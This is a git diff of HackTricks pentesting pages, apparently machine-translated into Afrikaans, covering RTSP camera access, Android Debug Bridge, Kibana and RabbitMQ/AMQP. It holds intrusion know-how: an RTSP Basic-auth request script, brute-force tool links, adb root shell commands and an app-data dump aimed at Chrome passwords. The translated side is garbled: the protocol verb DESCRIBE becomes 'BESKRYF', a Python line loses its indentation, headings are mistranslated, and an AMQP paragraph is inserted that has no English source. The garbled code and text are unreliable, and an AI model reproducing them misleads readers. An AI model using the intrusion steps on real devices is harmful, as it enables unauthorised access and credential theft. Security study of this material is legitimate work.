dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -From [wikipedia](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol): +Van [wikipedia](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol): -> The **Real Time Streaming Protocol** (**RTSP**) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client (Video On Demand) or from a client to the server (Voice Recording). +> Die **Real Time Streaming Protocol** (**RTSP**) is 'n netwerkbeheerprotokol wat ontwerp is vir gebruik in vermaak- en kommunikasiestelsels om streamingmediaserwers te beheer. Die protokol word gebruik om media-sessies tussen eindpunte te vestig en te beheer. Kliënte van mediaserwers gee VHS-styl-opdragte, soos speel, opneem en onderbreek, om die media wat van die bediener na 'n kliënt gestroom word (Video On Demand) of van 'n kliënt na die bediener (Voice Recording) in werklike tyd te beheer. > -> The transmission of streaming data itself is not a task of RTSP. Most RTSP servers use the Real-time Transport Protocol (RTP) in conjunction with Real-time Control Protocol (RTCP) for media stream delivery. However, some vendors implement proprietary transport protocols. The RTSP server software from RealNetworks, for example, also used RealNetworks' proprietary Real Data Transport (RDT). - -**Default ports:** 554,8554 +> Die oordrag van streamingdata self is nie 'n taak van RTSP nie. Die meeste RTSP-bedieners gebruik die Real-time Transport Protocol (RTP) in samewerking met die Real-time Control Protocol (RTCP) vir die aflewering van mediastroom. Sommige verskaffers implementeer egter eiendomlike vervoerprotokolle. Die RTSP-bedienersagteware van RealNetworks gebruik byvoorbeeld ook RealNetworks se eiendomlike Real Data Transport (RDT). +**Verstekpoorte:** 554,8554 ``` PORT STATE SERVICE 554/tcp open rtsp ``` +## Sleutelbesonderhede -## Key Details +**RTSP** is soortgelyk aan HTTP, maar spesifiek ontwerp vir mediastroom. Dit word gedefinieer in 'n eenvoudige spesifikasie wat hier gevind kan word: -**RTSP** is similar to HTTP but designed specifically for media streaming. It's defined in a straightforward specification which can be found here: +[RTSP - RFC2326](https://tools.ietf.org/html/rfc2326) -[RTSP – RFC2326](https://tools.ietf.org/html/rfc2326) +Toestelle kan **ongeagte** of **geagte** toegang toelaat. Om dit te kontroleer, word 'n "BESKRYF" versoek gestuur. 'n Basiese voorbeeld word hieronder getoon: -Devices might allow **unauthenticated** or **authenticated** access. To check, a "DESCRIBE" request is sent. A basic example is shown below: +`BESKRYF rtsp://: RTSP/1.0\r\nCSeq: 2\r\n` -`DESCRIBE rtsp://: RTSP/1.0\r\nCSeq: 2\r\n` +Onthou, die korrekte formaat sluit 'n dubbele "\r\n" in vir 'n konsekwente respons. 'n "200 OK" respons dui op **ongeagte toegang**, terwyl "401 Unauthorized" aandui dat daar verifikasie benodig word, wat onthul of **Basiese verifikasie** of **Digest-verifikasie** vereis word. -Remember, the correct formatting includes a double "\r\n" for a consistent response. A "200 OK" response indicates **unauthenticated access**, while "401 Unauthorized" signals the need for authentication, revealing if **Basic** or **Digest authentication** is required. +Vir **Basiese verifikasie**, enkodeer jy die gebruikersnaam en wagwoord in base64 en sluit dit in die versoek in soos volg: -For **Basic authentication**, you encode the username and password in base64 and include it in the request like so: - -`DESCRIBE rtsp://: RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n` - -This example uses "admin" and "1234" for the credentials. Here's a **Python script** to send such a request: +`BESKRYF rtsp://: RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n` +Hierdie voorbeeld gebruik "admin" en "1234" vir die geloofsbriewe. Hier is 'n **Python-skripsie** om so 'n versoek te stuur: ```python import socket req = "DESCRIBE rtsp://: RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n\r\n" @@ -56,51 +53,48 @@ s.sendall(req) data = s.recv(1024) print(data) ``` +**Basiese verifikasie** is eenvoudiger en verkieslik. **Digest-verifikasie** vereis sorgvuldige hantering van die verifikasiebesonderhede wat verskaf word in die "401 Onbevoegde" antwoord. -**Basic authentication** is simpler and preferred. **Digest authentication** requires careful handling of the authentication details provided in the "401 Unauthorized" response. - -This overview simplifies the process of accessing RTSP streams, focusing on **Basic authentication** for its simplicity and practicality in initial attempts. +Hierdie oorsig vereenvoudig die proses om toegang tot RTSP-strome te verkry, met die klem op **Basiese verifikasie** vanweë sy eenvoudigheid en praktiese aard in aanvanklike pogings. -## Enumeration - -Lets get information about valid methods and URLs are supported and try to brute-force the access (if needed) to get access to the content. +## Opname +Kry inligting oor geldige metodes en URL's wat ondersteun word en probeer toegang (indien nodig) met geweld verkry om toegang tot die inhoud te verkry. ```bash nmap -sV --script "rtsp-*" -p ``` - ### [Brute Force](../generic-methodologies-and-resources/brute-force.md#rtsp) -### **Other useful programs** +### **Ander nuttige programme** -To bruteforce: [https://github.com/Tek-Security-Group/rtsp\_authgrinder](https://github.com/Tek-Security-Group/rtsp\_authgrinder) +Om te brute force: [https://github.com/Tek-Security-Group/rtsp\_authgrinder](https://github.com/Tek-Security-Group/rtsp\_authgrinder) [**Cameradar**](https://github.com/Ullaakut/cameradar) -* Detect open RTSP hosts on any accessible target -* Get their public info (hostname, port, camera model, etc.) -* Launch automated dictionary attacks to get their stream route (for example /live.sdp) -* Launch automated dictionary attacks to get the username and password of the cameras -* Generate thumbnails from them to check if the streams are valid and to have a quick preview of their content -* Try to create a Gstreamer pipeline to check if they are properly encoded -* Print a summary of all the informations Cameradar could get +* Identifiseer oop RTSP-gashere op enige toeganklike teiken +* Kry hul openbare inligting (gasheernaam, poort, kamera-model, ens.) +* Lanceer outomatiese woordeboekaanvalle om hul stroomroete te kry (byvoorbeeld /live.sdp) +* Lanceer outomatiese woordeboekaanvalle om die gebruikersnaam en wagwoord van die kameras te kry +* Skep duimnaelskets van hulle om te kyk of die strome geldig is en 'n vinnige voorskou van hul inhoud te hê +* Probeer om 'n Gstreamer-pyplyn te skep om te kyk of hulle behoorlik gekodeer is +* Druk 'n opsomming van al die inligting wat Cameradar kon kry -## References +## Verwysings * [https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol) * [http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/](http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/) * [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/network-services-pentesting/5555-android-debug-bridge.md b/network-services-pentesting/5555-android-debug-bridge.md index 0b6cfcfbe..566c95a62 100644 --- a/network-services-pentesting/5555-android-debug-bridge.md +++ b/network-services-pentesting/5555-android-debug-bridge.md @@ -2,59 +2,53 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -From [the docs](https://developer.android.com/studio/command-line/adb): +Vanaf [die dokumentasie](https://developer.android.com/studio/command-line/adb): -**Android Debug Bridge** (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as i**nstalling and debugging apps**, and it provides **access to a Unix shell** that you can use to run a variety of commands on a device. - -**Default port**: 5555. +**Android Debug Bridge** (adb) is 'n veelsydige opdraglynhulpmiddel wat jou in staat stel om met 'n toestel te kommunikeer. Die adb-opdrag fasiliteer 'n verskeidenheid toestelaksies, soos die **installeer en foutopsporing van programme**, en dit bied **toegang tot 'n Unix-skil** wat jy kan gebruik om 'n verskeidenheid opdragte op 'n toestel uit te voer. +**Verstekpoort**: 5555. ``` PORT STATE SERVICE VERSION 5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909) ``` +## Koppel -## Connect - -If find the ADB service running in a port of a device and you can connect to it, **you can get a shell inside the system:** - +As jy die ADB-diens vind wat op 'n poort van 'n toestel loop en jy kan daarmee koppel, **kan jy 'n skulp binne die stelsel kry:** ```bash adb connect 10.10.10.10 adb root # Try to escalate to root adb shell ``` - -For more ADB commands check the following page: +Vir meer ADB-opdragte, kyk na die volgende bladsy: {% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} [adb-commands.md](../mobile-pentesting/android-app-pentesting/adb-commands.md) {% endcontent-ref %} -### Dump App data - -In order to completely download the data of an application you can: +### Stort App-data +Om die data van 'n toepassing heeltemal af te laai, kan jy die volgende doen: ```bash # From a root console chmod 777 /data/data/com.package cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data. adb pull "/sdcard/com.package" ``` - -You can use this trick to **retrieve sensitive information like chrome passwords**. For more info about this check the information a references provided [**here**](https://github.com/carlospolop/hacktricks/issues/274). +Jy kan hierdie truuk gebruik om **sensitiewe inligting soos Chrome-wagwoorde** te herwin. Vir meer inligting hieroor, kyk na die inligting en verwysings wat [**hier**](https://github.com/carlospolop/hacktricks/issues/274) verskaf word. ## Shodan @@ -62,14 +56,14 @@ You can use this trick to **retrieve sensitive information like chrome passwords
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/network-services-pentesting/5601-pentesting-kibana.md b/network-services-pentesting/5601-pentesting-kibana.md index aab2716cd..d9c1d6067 100644 --- a/network-services-pentesting/5601-pentesting-kibana.md +++ b/network-services-pentesting/5601-pentesting-kibana.md @@ -1,57 +1,53 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# Basic Information +# Basiese Inligting -Kibana is known for its ability to search and visualize data within Elasticsearch, typically running on port **5601**. It serves as the interface for the Elastic Stack cluster's monitoring, management, and security functions. +Kibana is bekend vir sy vermoë om data binne Elasticsearch te soek en te visualiseer, tipies op poort **5601**. Dit dien as die koppelvlak vir die monitering, bestuur en sekuriteitsfunksies van die Elastic Stack-klasters. -## Understanding Authentication +## Begrip van Verifikasie -The process of authentication in Kibana is inherently linked to the **credentials used in Elasticsearch**. If Elasticsearch has authentication disabled, Kibana can be accessed without any credentials. Conversely, if Elasticsearch is secured with credentials, the same credentials are required to access Kibana, maintaining identical user permissions across both platforms. Credentials might be found in the **/etc/kibana/kibana.yml** file. If these credentials do not pertain to the **kibana_system** user, they may offer broader access rights, as the kibana_system user's access is restricted to monitoring APIs and the .kibana index. +Die verifikasieproses in Kibana is inherent gekoppel aan die **legitimasie wat in Elasticsearch gebruik word**. As Elasticsearch verifikasie gedeaktiveer het, kan Kibana sonder enige legitimasie benader word. Omgekeerd, as Elasticsearch beveilig is met legitimasie, is dieselfde legitimasie nodig om Kibana te benader, met behoud van identiese gebruikersregte oor beide platforms. Legitimasie kan gevind word in die **/etc/kibana/kibana.yml**-lêer. As hierdie legitimasie nie betrekking het op die **kibana_system**-gebruiker nie, kan dit wyer toegangsregte bied, aangesien die toegang van die kibana_system-gebruiker beperk is tot monitering-API's en die .kibana-indeks. -## Actions Upon Access +## Aksies na Toegang -Once access to Kibana is secured, several actions are advisable: +Sodra toegang tot Kibana verseker is, word verskeie aksies aanbeveel: -- Exploring data from Elasticsearch should be a priority. -- The ability to manage users, including the editing, deletion, or creation of new users, roles, or API keys, is found under Stack Management -> Users/Roles/API Keys. -- It's important to check the installed version of Kibana for known vulnerabilities, such as the RCE vulnerability identified in versions prior to 6.6.0 ([More Info](https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2)). +- Die verkenning van data uit Elasticsearch moet 'n prioriteit wees. +- Die vermoë om gebruikers te bestuur, insluitend die wysiging, verwydering of skepping van nuwe gebruikers, rolle of API-sleutels, word gevind onder Stack Bestuur -> Gebruikers/Rolle/API-sleutels. +- Dit is belangrik om die geïnstalleerde weergawe van Kibana vir bekende kwesbaarhede te kontroleer, soos die RCE-kwesbaarheid wat geïdentifiseer is in weergawes voor 6.6.0 ([Meer Inligting](https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2)). -## SSL/TLS Considerations +## SSL/TLS-oorwegings -In instances where SSL/TLS is not enabled, the potential for leaking sensitive information should be thoroughly evaluated.s +In gevalle waar SSL/TLS nie geaktiveer is nie, moet die potensiaal vir die lek van sensitiewe inligting deeglik geëvalueer word. -## References +## Verwysings * [https://insinuator.net/2021/01/pentesting-the-elk-stack/](https://insinuator.net/2021/01/pentesting-the-elk-stack/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/5671-5672-pentesting-amqp.md b/network-services-pentesting/5671-5672-pentesting-amqp.md index a31a0c8b0..8d974184d 100644 --- a/network-services-pentesting/5671-5672-pentesting-amqp.md +++ b/network-services-pentesting/5671-5672-pentesting-amqp.md @@ -2,55 +2,63 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -From [cloudamqp](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html): +Van [cloudamqp](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html): -> **RabbitMQ** is a **message-queueing software** also known as a _message broker_ or _queue manager._ Simply said; it is software where queues are defined, to which applications connect in order to transfer a message or messages.\ -> A **message can include any kind of information**. It could, for example, have information about a process or task that should start on another application (which could even be on another server), or it could be just a simple text message. The queue-manager software stores the messages until a receiving application connects and takes a message off the queue. The receiving application then processes the message.\ -Definition from . - -**Default port**: 5672,5671 +> **RabbitMQ** is 'n **boodskap-ry-software** wat ook bekend staan as 'n _boodskapmakelaar_ of _rybestuurder_. Eenvoudig gestel; dit is sagteware waar rykies gedefinieer word, waaraan aansoeke koppel om 'n boodskap of boodskappe oor te dra.\ +> 'n **Boodskap kan enige soort inligting insluit**. Dit kan byvoorbeeld inligting hê oor 'n proses of taak wat op 'n ander aansoek moet begin (wat selfs op 'n ander bediener kan wees), of dit kan net 'n eenvoudige teksboodskap wees. Die rybestuurdersagteware stoor die boodskappe totdat 'n ontvangende aansoek koppel en 'n boodskap van die ry afhaal. Die ontvangende aansoek verwerk dan die boodskap.\ +Definisie van . +**Verstekpoort**: 5672,5671 ``` PORT STATE SERVICE VERSION 5672/tcp open amqp RabbitMQ 3.1.5 (0-9) ``` +## Opstel -## Enumeration - -### Manual - +### Handleiding ```python import amqp #By default it uses default credentials "guest":"guest" conn = amqp.connection.Connection(host="", port=5672, virtual_host="/") conn.connect() for k, v in conn.server_properties.items(): - print(k, v) +print(k, v) ``` +### Outomaties -### Automatic +AMQP (Asynchronous Messaging and Queueing Protocol) is 'n protokol wat gebruik word vir die kommunikasie tussen toepassings wat boodskappe uitruil. Dit is 'n protokol wat dikwels gebruik word in stelsels wat boodskappe-gebaseerde kommunikasie benodig, soos boodskap-gebaseerde ry-gebaseerde stelsels. +AMQP maak gebruik van 'n klient-bedieningsmodel, waar die klient die boodskap stuur en die bediener die boodskap ontvang en verwerk. Dit maak gebruik van 'n stelsel van uitruilings en ryë om die boodskappe tussen toepassings te roeteer. + +Tydens 'n pentest kan jy AMQP gebruik om te kyk vir moontlike kwesbaarhede en om toegang tot die stelsel te verkry. Hier is 'n paar tegnieke wat jy kan gebruik: + +- **Portskandering**: Skandeer die poorte 5671 en 5672 om te kyk of die AMQP-diens beskikbaar is. +- **Identifiseer die AMQP-bedieners**: Identifiseer die bedieners wat AMQP gebruik deur na spesifieke kenmerke in die antwoord te soek. +- **Verken die AMQP-stelsel**: Gebruik gereedskap soos RabbitMQ Management UI om die AMQP-stelsel te verken en inligting oor die uitruilings, ryë en boodskappe te verkry. +- **Aanvalle op die AMQP-stelsel**: Voer aanvalle uit soos die stuur van valse boodskappe, die oorbelasting van die bediener met 'n groot aantal boodskappe, of die manipulasie van die boodskappe om ongewenste aksies te veroorsaak. + +Dit is belangrik om te onthou dat jy toestemming moet hê om AMQP te pentest en dat jy die nodige etiese hacking-praktyke moet volg. ```bash nmap -sV -Pn -n -T4 -p 5672 --script amqp-info PORT STATE SERVICE VERSION 5672/tcp open amqp RabbitMQ 3.1.5 (0-9) -| amqp-info: -| capabilities: +| amqp-info: +| capabilities: | publisher_confirms: YES | exchange_exchange_bindings: YES | basic.nack: YES @@ -63,26 +71,25 @@ PORT STATE SERVICE VERSION | mechanisms: PLAIN AMQPLAIN |_ locales: en_US ``` - ### Brute Force -* [**AMQP Protocol Brute-Force**](../generic-methodologies-and-resources/brute-force.md#amqp-activemq-rabbitmq-qpid-joram-and-solace) -* [**STOMP Protocol Brute-Force**](../generic-methodologies-and-resources/brute-force.md#stomp-activemq-rabbitmq-hornetq-and-openmq) +* [**AMQP-protokol Brute-Force**](../generic-methodologies-and-resources/brute-force.md#amqp-activemq-rabbitmq-qpid-joram-and-solace) +* [**STOMP-protokol Brute-Force**](../generic-methodologies-and-resources/brute-force.md#stomp-activemq-rabbitmq-hornetq-and-openmq) -## Other RabbitMQ ports +## Ander RabbitMQ-poorte -In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) you can find that **rabbitmq uses several ports**: +In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) kan jy vind dat **rabbitmq verskeie poorte gebruik**: -* **1883, 8883**: ([MQTT clients](http://mqtt.org) without and with TLS, if the [MQTT plugin](https://www.rabbitmq.com/mqtt.html) is enabled. [**Learn more about how to pentest MQTT here**](1883-pentesting-mqtt-mosquitto.md). -* **4369: epmd**, a peer discovery service used by RabbitMQ nodes and CLI tools. [**Learn more about how to pentest this service here**](4369-pentesting-erlang-port-mapper-daemon-epmd.md). -* **5672, 5671**: used by AMQP 0-9-1 and 1.0 clients without and with TLS -* **15672**: [HTTP API](https://www.rabbitmq.com/management.html) clients, [management UI](https://www.rabbitmq.com/management.html) and [rabbitmqadmin](https://www.rabbitmq.com/management-cli.html) (only if the [management plugin](https://www.rabbitmq.com/management.html) is enabled). [**Learn more about how to pentest this service here**](15672-pentesting-rabbitmq-management.md). -* 15674: STOMP-over-WebSockets clients (only if the [Web STOMP plugin](https://www.rabbitmq.com/web-stomp.html) is enabled) -* 15675: MQTT-over-WebSockets clients (only if the [Web MQTT plugin](https://www.rabbitmq.com/web-mqtt.html) is enabled) -* 15692: Prometheus metrics (only if the [Prometheus plugin](https://www.rabbitmq.com/prometheus.html) is enabled) -* 25672: used for inter-node and CLI tools communication (Erlang distribution server port) and is allocated from a dynamic range (limited to a single port by default, computed as AMQP port + 20000). Unless external connections on these ports are really necessary (e.g. the cluster uses [federation](https://www.rabbitmq.com/federation.html) or CLI tools are used on machines outside the subnet), these ports should not be publicly exposed. See [networking guide](https://www.rabbitmq.com/networking.html) for details. **Only 9 of these ports opened on the internet**. -* 35672-35682: used by CLI tools (Erlang distribution client ports) for communication with nodes and is allocated from a dynamic range (computed as server distribution port + 10000 through server distribution port + 10010). See [networking guide](https://www.rabbitmq.com/networking.html) for details. -* 61613, 61614: [STOMP clients](https://stomp.github.io/stomp-specification-1.2.html) without and with TLS (only if the [STOMP plugin](https://www.rabbitmq.com/stomp.html) is enabled). Less than 10 devices with this port open and mostly UDP for DHT nodes. +* **1883, 8883**: ([MQTT-kliënte](http://mqtt.org) sonder en met TLS, as die [MQTT-invoegtoepassing](https://www.rabbitmq.com/mqtt.html) geaktiveer is. [**Leer meer oor hoe om MQTT te pentest hier**](1883-pentesting-mqtt-mosquitto.md). +* 